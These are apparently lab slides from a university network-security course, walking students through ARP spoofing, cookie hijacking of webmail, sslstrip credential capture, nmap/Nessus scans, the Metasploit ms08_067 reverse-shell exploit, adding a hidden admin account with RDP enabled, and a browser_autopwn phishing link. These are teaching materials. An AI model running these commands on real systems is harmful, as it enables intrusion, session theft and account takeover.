network attacks - computer networks security laboratory
TRANSCRIPT
Cybernetics and Economic Informatics Faculty Information Security Master
Computer Networks SecurityLaboratory Topic: Network Attacks
Adrian Furtun MSc, C|EH [email protected]
With great power comes great responsibility
Agenda1. Interception of network traffic transmitted using a clear-text protocol (HTTP)=> obtaining session cookies => using session cookies to enter a victims web session
2. 3. 4. 5. 6.
Interception of network traffic transmitted using an encrypted protocol (HTTPS)=> obtaining username and password for web login
Scanning the Windows VM using nmap (+Snort disabled/enabled) Scanning the Windows VM using Nessus (+Snort disabled/enabled) Gaining access to the Windows VM by exploiting a network service vulnerability Gaining access to a Windows machine with a client-side attack:=> social engineering => exploit browser vulnerability => use Metasploit to own the machine
Network Attacks
2
RulesIt is forbidden:Any scanning / attack outside laboratory network Any scanning / attack against your colleagues machines or against instructors machine
Breaking these rules might lead to severe penaltiesNetwork Attacks 3
Administrative tasksConnect to ftp://[email protected]: stud password: stud
Download:Course slides VMWare Player: VMware-player-3.1.3.exe Windows VM: winxpsp2_web_snort.zip Backtrack VM: bt4-final-vm.zip
Install VMWare Player Unzip both virtual machinesNetwork Attacks 4
Virtual machine configuration
Network Attacks
5
Laboratory setup (1)You will work in pairs (1 pair = 2 distinct computers): attacker and victim Victim machine = host machine Attacker machine = Backtrack VMStart Backtrack [ username: root, password: toor ] Open graphic mode: startx& Set network card in mode bridge ! Obtain IP address: dhclient eth0
Network Attacks
6
Laboratory setup (2)
Network Attacks
7
Exercise 1Obtain the session cookies of a victim from the local network and use them to enter his Yahoo mail accountThe victim needs a valid Yahoo mail account (a test account) The victim will open a web mail session The attacker1. Becomes MITM 2. Captures network traffic of the victim and extracts the necessary dataNetwork Attacks 8
Exercise 1 cont.Attacker machine: Become MITM and intercept all traffic sent by victim to the Gateway. View the traffic using Wireshark.1. 2.
Find the IP addresses of Victim and Gateway Activate the routing process in Backtrackecho 1 > /proc/sys/net/ipv4/ip_forward
3.
Inform the Victim that the Gateways MAC address is your MAC address attacker. (ARP poisoning using ARP replies)arpspoof i eth0 t IP_Victim IP_Gateway
4.
View the network traffic of Victim using WiresharkNetwork Attacks 9
Exercise 1 cont.1. Find the session cookies of Victim and use them to enter his email session Wireshark -> Follow TCP stream on a TCP packet sent by Victim:
2. 3. 4. 5. 6.
Copy the cookies Y and T in a text file Install the Firefox plugin AddNEdit Cookies Open an Yahoo mail session of your own (attacker) Use the plugin to edit your cookies and replace Y and T with the ones of the Victim Refresh the web pageNetwork Attacks
10
Exercise 2Intercept network traffic during a HTTPS session. Find the username and password of the Victim.1. 2.
Make yourself MITM (see exercise 1) Start SSLSTRIP and make it listen on port 1234sslstrip l 1234 s w traffic.log More details here: http://www.thoughtcrime.org/software/sslstrip/
3.
Configure IPTABLES to redirect HTTP traffic to SSLSTRIPiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1234
4. 5.
The victim accesses a web site using HTTPS (ex. Yahoo login) Extract the useful information from file traffic.log
Network Attacks
11
About Snort
http://www.snort.org/assets/166/snort_manual.pdf
Netwok-based IDS Open source (free) Sourcefire commercial version (appliance)http://www.sourcefire.com/
Portable (Linux, Windows, MacOS X, Solaris, BSD, HP-UX, etc) Multiple mechanisms for intrusion detectionSignatures (rules): www.bleedingsnort.com Statistic anomalies Protocol anomalies
Network Attacks
12
About Snort cont.Snort running modes: Sniffer mode (like tcpdump) snort.exe -v d -e Packet logger Snort Packet Stream Sniffing Packet Decoder Preprocessor (Plug-ins) Detection Engine (Plug-ins) Output Stage (Plug-ins) Data Flow snort.exe vde log ..\log NIDS snort.exe d log ..\log c ..\etc\snort.conf
Alerts/Logs
Network Attacks
13
Nmap briefingsTCP connect() scan: TCP SYN scan: TCP UDP scan: Ping scan: nmap sT nmap sS nmap sU nmap sP
TCP FIN / Xmas Tree / Null scan: nmap sF/sX/sN Version Detection: OS Fingerprinting: nmap sS -sV nmap sS -O
Example $ nmap -sS -sV -O -F -n 192.168.1.1Network Attacks 14
Change setupStart the Windows VM New attack direction:Backtrack Windows VM
Network Attacks
15
Exercise 3Using nmap, scan the whole subnet of the victim machine (connected to vmnet8).Obtain the following information (from a single scan): Live hosts Open TCP ports Service version Operating system - Save all output in a text file
Hints:nmap h man nmap
Network Attacks
16
Exercise 3 cont.Check if the scanning can be detected by a NIDS (Snort)Authenticate to Windows VM (password: user) Start Snort cmd.exe -> cd c:\snort\bin snort.exe d l ..\log c ..\etc\snort.conf A console
Perform the scanning again using Nmap Any alert? (see c:\Snort\log\alert.ids)
Network Attacks
17
Exercise 4Scan the victim machine using Nessus to find vulnerabilities1. First install Nessus on BackTrack: Download Nessus (for Ubuntu 9.10 32 bit) dpkg i Nessus-4.4.1-ubuntu910_i386.deb
http://www.tenable.com
2. Then obtain a Nessus activation code (Home Feed) http://www.tenable.com/products/nessus/nessus-plugins/register-a-homefeed 3. Configure Nessus server Add a Nessus user: /opt/nessus/sbin/nessus-adduser Register Nessus and update plugins: /opt/nessus/bin/nessus-fetch --register CODE Start Nessus server: /etc/init.d/nessusd start 4. Start Nessus client:
https://127.0.0.1:8834Network Attacks 18
Exercise 4 cont.Sample vulnerability:1. 2. 3. 4.
Create a scan policy Select plugins Set target Run scan
Network Attacks
19
About MetasploitFramework for writing and executing exploits Modules Exploits Auxiliary Payloads Encoders Nops User interfaces: - console: msfconsole - GUI: Updates: msfgui
cd /pentest/exploits/framework3 svn update
Select Exploit -> Configure options + payload -> Run exploit -> Execute payloadTutorial: http://www.offensive-security.com/metasploit-unleashedNetwork Attacks 20
Exercise 5We will use Metasploit to exploit vulnerability ms08-067 and gain remote access to Victim machine cd /pentest/exploits/framework3 ./msfconsole help search ms08-067 use exploit/windows/smb/ms08_067_netapi show options show payloads set RHOST, LHOST, PAYLOAD, TARGET = 3, etc (for payload use windows/shell/reverse_tcp) 8. exploit 9. Execute windows commands in the obtained shell (ex. ipconfig, hostname)1. 2. 3. 4. 5. 6. 7. 8.Network Attacks 21
Exercise 5 cont.Obtain Remote Desktop access to Victim machine:Add a new user:
net user myuser mypassword /addAdd the new user in the local Administrators group:
net localgroup Administrators myuser /addStart the Remote Desktop service
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fCheck if the victim has open the port for Remote Desktop (use nmap) Connect to the victim machine using:
rdesktop 192.168.x.x &Network Attacks 22
What if?Victim has all ports closed (firewall) Operating system is patched Answer: Attack client applications and plugins(web browser, Acrobat Reader, MS Office, etc)
Network Attacks
23
Change setupStart the firewall of Windows VM Disable any exceptions Use nmap to verify that there are no more open ports
Network Attacks
24
Exercise 6Exploit browser vulnerability to gain remote acces. Use Metasploit and browser autopwn1. 2. 3. 4. 5. 6. 7.
cd /pentest/exploits/framework3 ./msfconsole use auxiliary/server/browser_autopwn set LHOST 192.168.x.x (attacker IP) set SRVPORT 80 set URIPATH mypictures.html exploitNetwork Attacks 25
Exercise 6 cont.Send victim an email containing the link: http://192.168.x.x/mypictures.html Victim clicks the link Attacker obtains meterpreter session
Network Attacks
26
Other useful toolsEttercap http://ettercap.sourceforge.net Cain&Abel http://www.oxid.it/cain.html The Middler http://inguardians.com/tools
Network Attacks
27
Q&A
?
Network Attacks
28